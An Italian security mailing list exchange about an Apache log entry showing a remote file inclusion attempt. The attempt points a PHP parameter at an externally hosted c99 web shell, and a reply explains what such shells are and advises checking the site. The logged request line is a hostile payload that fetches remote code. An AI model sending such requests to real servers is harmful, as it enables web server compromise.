Il giorno 30/gen/08, alle ore 00:31, David Galligani ha scritto:
Ciao ragazzi ,
innanzi tutto grazie a tutti coloro che mi hanno risposto sul tema
dell' ecommerce .
Mi trovo a scrivervi di nuovo , perchè stavo guardando i log del mio
apache2 ( alla tv non danno niente di interessante :D ) .
E ho trovato questo :
81.246.45.219 - - [29/Jan/2008:21:29:34 +0100] "GET /admin/
business_inc/saveserver.php?thisdir=http://80.231.130.12/wwwroot/c99.txt?
HTTP/1.1" 404 231
Incuriosito sono andato a vedere questo c99.txt , che di txt ha
veramente poco
Non pago , me lo sono scaricato per vedere che faceva , l'ho
installato sul mio portatile e l'ho fatto girare .
Risultato , una pseudo shell in php ( devo dire molto carina ) con
cui sono riuscito a navigare fino alla / , anche se non mi faceva
vedere files su cui non avevo permessi ...
Inoltre , ha tentato di mandare varie mail :
[...]
Qualcuno sa qualcosa di piú su questo exploit ?
In caso qualcuno volesse studiarselo lo trova qui di seguito ( in
attach non me lo fa mandare l'antivirus ...)
Ciao
David
Tecnicamente non ha nulla a che vedere con un exploit.. Come hai avuto
modo di appurare tu stesso, è semplicemente uno script in PHP che
permette di automatizzare e semplificare la navigazione all'interno
del filesystem e qualche altra operazione. Non è nulla di nuovo,
circolano da alcuni anni questi script negli ambienti underground,
sono particolarmente apprezzati da cracker russi. Quello che tu hai
trovato (c99shell) è uno dei due più noti, l'altro è r57, e poi tanti
altri.. Vengono usati soprattutto per ottimizzare lo sfruttamento di
vulnerabilità di tipo remote file inclusion nelle web application (http://lwn.net/Articles/203904/
), controlla che sul tuo sito sia tutto a posto.
Saluti,
Alberto Trivero________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
